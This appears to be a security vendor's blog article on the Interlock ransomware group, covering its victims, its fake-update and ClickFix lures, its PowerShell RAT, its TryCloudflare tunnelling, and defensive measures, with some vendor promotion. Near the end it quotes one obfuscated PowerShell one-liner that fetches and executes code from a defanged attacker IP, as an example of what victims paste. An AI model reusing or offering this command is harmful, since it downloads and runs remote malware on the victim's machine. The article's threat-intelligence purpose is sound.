In the ransomware landscape of 2025, Interlock has started to make its presence known. Although it is a relatively new group, it has already positioned itself as an opportunistic actor that effectively exploits compromised websites and employs sophisticated social engineering tactics to distribute its malware.
First detected in September 2024, Interlock breaks away from the traditional Ransomware-as-a-Service (RaaS) model. Unlike other groups, it doesn’t rely on affiliates or promote its operations publicly. Instead, it operates in a more closed and direct manner, with campaigns designed to maximize financial gain. Its strategy? The well-known double extortion method: encrypting victims' data and threatening to expose it if the ransom isn’t paid.
To support this, the group uses its own infrastructure and a dedicated leak site called “Worldwide Secrets Blog,” where it publishes stolen information as a form of pressure.
In this article, we’ll explain how Interlock typically attacks, what makes it different, and most importantly, what you can do to protect your organization from this increasingly common threat.
Interlock Ransomware, also known in some circles as Nefarious Mantis, is one of the most active and concerning cybercriminal groups of 2025. Although it was first detected in September 2024, it has rapidly escalated within less than a year to become a high-level threat, particularly targeting key companies and organizations in North America and Europe.
During this short time, Interlock has attacked critical sectors such as education, healthcare, technology, and government agencies, taking advantage of environments where cybersecurity defenses are limited or outdated.
In fact, in June 2025, both the FBI and the U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued a joint alert warning about the increase in Interlock’s activity. This made it clear that we’re no longer dealing with a fringe group but with a major player in the global ransomware scene.
Unlike many other well-known ransomware groups, Interlock does not follow the traditional Ransomware-as-a-Service (RaaS) model. It doesn’t recruit affiliates or advertise its tools. All signs point to a closed and highly organized group with a 100% financial motivation.
One of the most curious aspects of its operation is that it gains initial access through legitimate websites that have been compromised—an uncommon technique among ransomware actors. This method, known as drive-by download, is more typical of general malware campaigns, but Interlock has successfully incorporated it into its toolkit.
And that’s not all. In May 2025, they began using a social engineering technique called ClickFix, which tricks users into downloading malicious software under the impression that they’re resolving a technical issue on their devices. Subtle and dangerous.
Another interesting detail is that the payload (the software that encrypts files) often executes within virtual machines, reducing the risk of detection by traditional antivirus software. This also means that the primary systems (physical hosts) are often not directly affected, complicating early detection of the attack.
According to open-source reports, there are notable similarities between Interlock and Rhysida, another well-known ransomware group. While no official confirmation has been made, there is a possibility that Interlock may be a spinoff or evolution of Rhysida.
Even CISA has published information on Rhysida that may help better understand Interlock’s tactics. For now, this connection remains a hypothesis, but there’s no doubt the two groups share similar methods and objectives.
Interlock’s activity has increased significantly in recent months. Here are some of the most relevant attacks reported in 2025:
On July 22, 2025, the FBI and CISA issued a joint advisory noting that Interlock had upgraded its malware, making it more difficult to detect. Most concerning is that the group now uses encryptors designed for both Windows and Linux systems and has been seen encrypting virtual machines on both platforms.
This technological evolution suggests that Interlock is seriously investing in improving its tools and expanding its reach.
One of the most impactful incidents was the attack on DaVita, a major network of clinics specializing in kidney treatment. In this case, Interlock managed to steal 1.5 terabytes of sensitive data, affecting over 200,000 patients.
The leaked data included confidential medical information, sparking national concern over cybersecurity in the healthcare sector.
Another recent case was the attack on the city of St. Paul, where Interlock succeeded in disabling several critical municipal systems and endangered the personal data of at least 3,500 public employees.
Most strikingly, 10 days before the attack, cyber intelligence firm PRODAFT had already detected suspicious activity attributed to Interlock in the city’s systems. They even issued a public warning on X (formerly Twitter), citing a “high likelihood of spread.”
As of mid-August 2025, at least 58 organizations have been confirmed as victims, with their data published on Interlock’s leak site: the so-called “Worldwide Secrets Blog.” This portal is a key part of their double extortion strategy—if you don’t pay, your data goes public.
Interlock Leak Site: "Worldwide Secrets Blog"
Read more: Main Ransomware Actors in the First Half of 2025
One of the most concerning aspects of Interlock Ransomware is the silent and sophisticated way it infiltrates systems. Unlike louder or more obvious attacks, Interlock prefers to operate in the shadows, using techniques that mimic legitimate behavior and directly deceive the user.
Interlock relies on an approach that combines social engineering with a cybersecurity tactic known as Living off the Land (LOTL). What does that mean? Essentially, it uses legitimate tools and processes built into the operating system (such as PowerShell or software updates) to disguise its malicious activity and evade detection by traditional antivirus programs or endpoint security solutions.
The danger of this method lies in the fact that users often don’t realize they’re unknowingly assisting the attack. The malicious instructions are usually hosted on compromised websites that appear legitimate, creating a false sense of trust. That’s what makes the trap so easy to fall into.
The first phase of Interlock’s attack begins with fake software updates. Imagine visiting a seemingly normal website (possibly even one you trust) and seeing a message that says your browser (like Chrome or Edge) needs to be updated.
That so-called “update” is actually a tampered version, bundled with a tool like PyInstaller, designed to look like a legitimate installer. The user believes they’re installing a Google Chrome update, but in reality, a malicious script is executed that gives the attacker full access to the system.
When the user follows the instructions (e.g., clicks “Update Now”), the following occurs:
A real Chrome or Edge installer is launched as a decoy.
In the background, a malicious PowerShell script runs without the user noticing.
That script acts as a backdoor and communicates with the attackers’ command and control (C2) servers.
From there, the attacker can:
A key technique used by Interlock is called ClickFix. It’s a rather clever form of social engineering where attackers trick users into unknowingly executing malicious commands on their own systems.
The trick is to make the user believe they’re “fixing” something. For example, a pop-up might appear indicating a technical issue (like a failed update) and instruct the user to follow a series of steps to resolve it.
Here’s where the psychological manipulation kicks in: the site tells you to press “Windows + R” (to open the Windows “Run” dialog), then “CTRL + V” to paste a pre-copied command, and finally to press “Enter.”
What you’re actually doing at that moment is running a malicious PowerShell command that completely compromises your device.
The fake ClickFix updater dialog prompts users to manually execute the PowerShell command.
In addition to ClickFix, a variant called FileFix has been observed. It follows the same logic of exploiting user trust but with slight differences in its delivery method. Both techniques share a common goal: to trick the user into executing malicious code on their own, disguised as a legitimate solution to a non-existent problem.
ClickFix is not exclusive to Interlock. It has also been used in campaigns distributing:
Lumma Stealer (LummaC2)
AsyncRAT
DanaBot
DarkGate
This shows that the technique is popular among cybercriminal groups for one very simple reason: it works. And as long as it remains effective, we can expect to see more variants tailored to different campaigns and targets.
Read more: Lumma Malware Detected in Mexico and Selling Data on the Dark Web
Once the user mistakenly executes the malicious command (usually tricked through a technique like ClickFix), a PowerShell backdoor is activated and begins operating very discreetly. There are no open windows or visible alerts. This backdoor simply runs in the background, restarting separately to avoid suspicion and bypass traditional monitoring tools.
Essentially, it begins communicating with remote servers controlled by the attackers—known as command and control (C2) servers—via HTTP requests. And in case one of these servers goes offline, there's a backup list of several domains and IP addresses to keep the connection alive.
One of the reasons this technique remains so effective is due to code obfuscation. In simple terms, attackers hide their actual commands under layers of tangled code that appear harmless or unreadable at first glance.
In recent campaigns—especially those using social engineering like ClickFix—a wide variety of PowerShell commands have been detected. All are specifically designed to bypass security systems that search for known patterns or keywords.
Replacing letters with character codes.
Using symbols like +, *, and ? to scramble the code.
Wrapping malicious commands inside legitimate functions such as:
Invoke-RestMethod
Invoke-Expression
Aliases of these functions
These malicious commands often include hidden URLs—some hosted on dangerous domains, others on legitimate services repurposed for malicious use, such as trycloudflare.com, or even direct IPv4 addresses that don’t raise immediate suspicion.
Once active, this malicious tool begins collecting critical information from the compromised system, including:
Operating system details
User privileges
Running processes and services
Network configurations
Before sending this information to the attackers’ server, the script obfuscates and compresses it to avoid detection by security tools.
Once the cybercriminals receive this data, the C2 server can issue new instructions, such as:
Downloading and installing malicious executables or DLLs
Executing custom commands
Expanding control within the compromised network
Read more: Lethal Hacker Alliance: ShinyHunters and Scattered Spider Strike
To maintain control and navigate within infected systems, Interlock commonly uses advanced and well-known tools from the cybercrime world, including:
Cobalt Strike – A penetration testing toolkit frequently repurposed by attackers.
Interlock RAT – Likely developed in-house by the group.
NodeSnake RAT – A remote access tool written in Node.js.
SystemBC – A platform used to conceal malicious traffic through proxy tunneling.
These tools not only facilitate covert communication but also enable attackers to move laterally across the network and launch further attacks from within.
PowerShell.exe -w h -c "iex $(irm 138[.]199.156[.]22:8080/$($z = [datetime]::UtcNow; $y = ([datetime]('01/01/' + '1970')); $x = ($z – $y).TotalSeconds; $w = [math]::Floor($x); $v = $w – ($w % 16); [int64]$v))"
Example of a Malicious PowerShell Script That Victims Are Tricked Into Executing
As Interlock has evolved, so has its ability to remain within systems once compromised. In the most recent versions of its malicious script (up to version 11), it has been observed establishing persistence through the Windows Registry.
This means that even if the system is rebooted or the user tries to clean the device, the malicious script can automatically relaunch and maintain its connection with the command and control servers.
One of Interlock’s smartest (and most concerning) tactics is how it leverages legitimate tools for malicious activities. Specifically, it abuses TryCloudflare, a Cloudflare Tunnel feature designed to easily create temporary tunnels without needing to set up a domain on Cloudflare.
Attackers use dynamically generated subdomains via TryCloudflare to hide their communications and avoid easy blocking. Because these addresses look legitimate and change constantly, tracing their origin or stopping their activity in time becomes extremely difficult.
These temporary domains act as proxies that channel malicious traffic, blending it with seemingly normal traffic to evade security filters.
One of the reasons Interlock Ransomware is gaining so much attention is due to how effectively it avoids detection. Not only does it strike stealthily, but it has also continued to refine its tools to bypass traditional security solutions.
Recently, it was confirmed that Interlock has added a custom Remote Access Trojan (RAT) to its arsenal, developed in PowerShell. This is no ordinary tool—it’s purpose-built to integrate into the early stages of the attack and enable remote control of the infected system.
How is it delivered? Through its now-familiar tactic: fake software updates that appear on compromised websites. The user thinks they’re installing something legitimate but are actually opening the door to this stealthy RAT.
Once inside the system, the PowerShell-based RAT runs in the background, showing no visible windows or alerts. This allows it to operate for days—or even weeks—without raising any suspicion.
This RAT has two primary functions:
Collect detailed system information (such as configurations, active processes, network details, user privileges, etc.).
Allow attackers to execute remote commands and download additional malicious payloads to advance the attack (such as encrypting files or moving laterally through the network).
All of this happens persistently, meaning it stays active even after the device is rebooted, making it difficult to remove.
When a threat like Interlock Ransomware emerges, there’s no time to waste. At TecnetOne, our Security Operations Center (SOC) is prepared to act as soon as we detect suspicious activity or active campaigns.
Instead of reacting too late, we work proactively. How? We continuously monitor the threat landscape, and when we identify something new—such as tactics, techniques, or indicators of compromise (IoCs) used by groups like Interlock—we immediately adjust our detection rules.
Thanks to our expertise and use of up-to-date threat intelligence, our team:
Detects attacks in early stages (before they become a full-blown crisis).
Strengthens each client’s security in a personalized way.
Implements new defenses in real time.
And this isn’t a one-time effort. As new variants or behaviors emerge, we continuously improve our detections to cover every angle attackers might exploit.
In short: While others are discovering the attack too late, we’re already blocking it.
Interlock isn’t new, but its activity throughout 2025 has made it a threat that can no longer be ignored. Just this year, it has already triggered official warnings from the FBI and CISA, and its attack on the city of Saint Paul made it clear that the group is raising the stakes—targeting bigger victims with the expectation of higher ransom payouts, regardless of whether they compromise critical infrastructure.
This group doesn’t just encrypt files. It uses malware like Interlock RAT, infiltrates through compromised websites, and constantly adapts. Their objective is clear: impact, pressure, and fast profits.
There’s no silver bullet to completely stop Interlock, but there are many effective measures you can implement today. Here are the most important ones:
Prevent Initial Access: Use firewalls that filter DNS and web traffic, and train your team to spot phishing attempts and fake software updates.
Block Malicious Tunnels: If you’re not using services like TryCloudflare for legitimate operations, block their domains on your network.
Apply Security Patches: Keep your OS, software, and firmware fully updated. Outdated vulnerabilities remain attackers’ favorite targets.
Segment Your Network: Divide your infrastructure to limit damage if a device is compromised.
Manage Identities and Access: Enforce strong policies for user, credential, and permission management across your organization.
Have an Incident Response Plan Ready: Ensure you have a specialized team or provider prepared to act swiftly if something goes wrong.
Implement an EDR Solution: Tools like TecnetProtect don’t just detect hidden signs of attack—they can stop intrusions before the attackers gain control.
Enable Multi-Factor Authentication (MFA): Especially for corporate email, VPNs, and any critical system.
Engage a SOC for Continuous Monitoring: Having a 24/7 SOC like TecnetOne’s gives you real-time visibility into your network activity. This allows you to detect threats before they act and respond without delay.